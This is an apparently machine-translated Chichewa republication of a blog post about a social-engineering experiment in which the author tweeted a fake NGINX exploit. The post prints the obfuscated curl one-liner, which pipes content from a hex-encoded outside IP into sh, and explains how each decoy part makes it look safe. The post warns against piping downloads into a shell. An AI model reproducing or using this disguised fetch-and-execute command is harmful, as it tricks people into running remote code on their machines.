Pulogalamu ya ProHoster > Blog > Ulamuliro > Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit

Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit

Zindikirani. transl.: wolemba cholemba choyambirira, chosindikizidwa pa June 1, adaganiza zoyesa kuyesa pakati pa omwe ali ndi chidwi ndi chitetezo chazidziwitso. Kuti achite izi, adakonza zowononga zabodza pachiwopsezo chosadziwika mu seva yapaintaneti ndikuchiyika pa Twitter. Malingaliro ake - kuti awululidwe nthawi yomweyo ndi akatswiri omwe angawone chinyengo chodziwikiratu mu code - osati kungochitika ... fufuzani zomwe zili mkati mwake.

Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit

TL; DR: Osagwiritsa ntchito mapaipi amafayilo mu sh kapena bash mulimonse. Iyi ndi njira yabwino kulephera kulamulira kompyuta yanu.

Ndikufuna kugawana nanu nkhani yachidule yokhudza zamatsenga za PoC zomwe zidapangidwa pa Meyi 31st. Adawonekera mwachangu poyankha nkhani zochokera Alisa Esage Shevchenko, membala Tsiku Loyamba la Zero (ZDI), kuti chidziwitso chokhudza chiwopsezo cha NGINX chotsogolera ku RCE (kutalika kwa code) chidzawululidwa posachedwa. Popeza NGINX imapatsa mphamvu mawebusayiti ambiri, nkhaniyi iyenera kuti inali bomba. Koma chifukwa cha kuchedwa kwa "kuwulura moyenera", tsatanetsatane wa zomwe zidachitika sizinadziwike - iyi ndi njira yokhazikika ya ZDI.

Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit
tweet za kuwululidwa pachiwopsezo mu NGINX

Nditamaliza kugwiritsa ntchito njira yatsopano yolumikizira ma curl, ndidagwira mawu a tweet yoyambirira ndi "kutulutsa PoC" yomwe ili ndi mzere umodzi wa code womwe ukuganiza kuti umagwiritsa ntchito chiwopsezo chomwe chapezeka. Inde, izi zinali zopanda pake. Ndinkaganiza kuti ndiwululidwa nthawi yomweyo, ndikuti ndikapeza ma retweets angapo (o, chabwino).

Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit
tweet ndi fake exploit

Komabe, sindinathe kulingalira zimene zinachitika pambuyo pake. Kutchuka kwa ma tweet anga kudakwera kwambiri. Chodabwitsa n'chakuti panthawiyi (15:00 Moscow nthawi ya June 1) anthu ochepa azindikira kuti izi ndi zabodza. Anthu ambiri amabwerezanso osayang'ana konse (osasiyapo kusirira zithunzi zokongola za ASCII zomwe zimatulutsa).

Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit
Tangoonani kukongola kwake!

Ngakhale malupu ndi mitundu yonseyi ndi yabwino, zikuwonekeratu kuti anthu amayenera kuyendetsa makina pamakina awo kuti awone. Mwamwayi, asakatuli amagwira ntchito mofananamo, ndikuphatikizana ndi mfundo yakuti sindinkafuna kwenikweni kulowa m'mavuto azamalamulo, kachidindo kamene kakayikidwa pa tsamba langa anali kungoyimba ma echo popanda kuyesa kuyika kapena kuchita zina zowonjezera.

Kutuluka pang'ono: netspooky, dnz, ine ndi anyamata ena a timuyi Thuggulu Takhala tikusewera ndi njira zosiyanasiyana zochepetsera malamulo opiringa kwakanthawi chifukwa ndizabwino ... ndipo ndife akatswiri. netspooky ndi dnz adapeza njira zingapo zatsopano zomwe zimawoneka ngati zolimbikitsa kwambiri kwa ine. Ndidalowa nawo muzosangalatsa ndikuyesera kuwonjezera matembenuzidwe a decimal a IP ku thumba lazanzeru. Zikuwoneka kuti IP imathanso kusinthidwa kukhala mawonekedwe a hexadecimal. Kuphatikiza apo, ma curl ndi zida zina zambiri za NIX zimadya mosangalala ma hexadecimal IPs! Chifukwa chake inali nkhani yongopanga mzere wamalamulo wotsimikizika komanso wowoneka bwino. Pomaliza ndinakhazikika pa izi:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE) - zambiri osati phishing

Chitetezo ndi kudziwana zinali mbali yaikulu ya kuyesaku. Ndikuganiza kuti ndi zomwe zidapangitsa kuti apambane. Mzere wolamula umatanthauza chitetezo potchula "127.0.0.1" (wodziwika bwino wamba). Localhost imatengedwa kuti ndi yotetezeka ndipo zomwe zilimo sizichoka pakompyuta yanu.

Kudziwa bwino kunali gawo lachiwiri la ONANI chigawo cha kuyesa. Popeza omvera omwe amawatsata makamaka anali anthu omwe amadziwa zofunikira za chitetezo cha makompyuta, kunali kofunika kupanga kachidindo kuti mbali zake ziwoneke ngati zodziwika komanso zodziwika bwino (ndipo zimakhala zotetezeka). Kubwereka zinthu zamalingaliro akale amapezerapo mwayi ndikuphatikiza mwanjira yachilendo kwatsimikizira kukhala kopambana kwambiri.

Pansipa pali kusanthula kwatsatanetsatane kwa mzere umodzi. Zonse zomwe zili pamndandandawu zimavala zodzikongoletsera chikhalidwe, ndipo kwenikweni palibe chimene chimafunika pa ntchito yake yeniyeni.

Ndi zigawo ziti zomwe zili zofunikadi? Izi -gsS, -O 0x0238f06a, |sh ndi seva yapaintaneti yokha. Seva yapaintaneti inalibe malangizo oyipa, koma idangopereka zithunzi za ASCII pogwiritsa ntchito malamulo echo mu script yomwe ili mu index.html. Pamene wosuta adalowa mzere ndi |sh pakati, index.html zodzaza ndi kuphedwa. Mwamwayi, oyang'anira seva yapaintaneti analibe zolinga zoyipa.

  • ../../../%00 - imayimira kupyola chikwatu;
  • ngx_stream_module.so - njira yopita ku module ya NGINX mwachisawawa;
  • /bin/sh%00<'protocol:TCP' - timangoganiza zoyamba /bin/sh pa makina omwe mukufuna ndikuwongolera zomwe zimatuluka ku njira ya TCP;
  • -O 0x0238f06a#PLToffset - chinsinsi chopangira, chowonjezera #PLToffset, kuoneka ngati kukumbukira kukumbukira mwanjira ina yomwe ili mu PLT;
  • |sh; - chidutswa china chofunikira. Tidayenera kuwongolera zomwe zatuluka ku sh/bash kuti tipereke nambala yomwe imachokera ku seva yowukira yomwe ili pa. 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - dummy momwe netcat imatanthawuza /dev/tcp/localhostkotero kuti zonse zikuwoneka zotetezeka kachiwiri. Ndipotu, sichichita kalikonse ndipo imaphatikizidwa pamzere wa kukongola.

Izi zimamaliza kumasulira kwa script ya mzere umodzi ndikukambirana za "socio-electronic engineering" (phishing yovuta).

Kusintha kwa Seva Yapaintaneti ndi Zoyeserera

Popeza ambiri mwa olembetsa anga ndi infosec / hackers, ndinaganiza zopanga seva yapaintaneti kuti ikhale yosagwirizana ndi mawu a "chidwi" kumbali yawo, kuti anyamatawo akhale ndi chochita (ndipo zingakhale zosangalatsa khazikitsa). Sindilemba misampha yonse pano popeza kuyesaku kukupitilirabe, koma nazi zinthu zingapo zomwe seva imachita:

  • Imayang'anitsitsa zoyeserera zogawira pa malo ena ochezera a pa Intaneti ndikulowetsamo tizithunzi tating'ono tosiyanasiyana kuti tilimbikitse wogwiritsa ntchito kudina ulalo.
  • Imawongolera Chrome/Mozilla/Safari/etc kuvidiyo yotsatsira ya Thugcrowd m'malo mowonetsa chipolopolo.
  • Kuyang'ana zizindikiro zowoneka bwino za kulowerera / kubera mobisa, kenako ndikuyamba kulozera zopempha ku ma seva a NSA (ha!).
  • Imayika Trojan, komanso BIOS rootkit, pamakompyuta onse omwe ogwiritsa ntchito amachezera omwe ali nawo kuchokera pa msakatuli wokhazikika (kungosewera!).

Kupambana pakuyesa kwachiyanjano ndi fake nginx exploit
Gawo laling'ono la antimers

Pankhaniyi, cholinga changa chokha chinali kudziwa zina mwa Apache - makamaka, malamulo ozizira otsogolera zopempha - ndipo ndinaganiza: bwanji?

NGINX Exploit (Zowona!)

Lembetsani ku @alisaesage pa Twitter ndikutsatira ntchito yayikulu ya ZDI pothana ndi zofooka zenizeni ndikugwiritsa ntchito mwayi mu NGINX. Ntchito yawo yakhala ikundisangalatsa nthawi zonse ndipo ndikuthokoza Alice chifukwa cha kuleza mtima kwake ndi zonena ndi zidziwitso zomwe tweet yanga yopusa idayambitsa. Mwamwayi, idachitanso zabwino: idathandizira kudziwitsa za kusatetezeka kwa NGINX, komanso mavuto obwera chifukwa cha nkhanza zopiringa.

Source: www.habr.com

Kuwonjezera ndemanga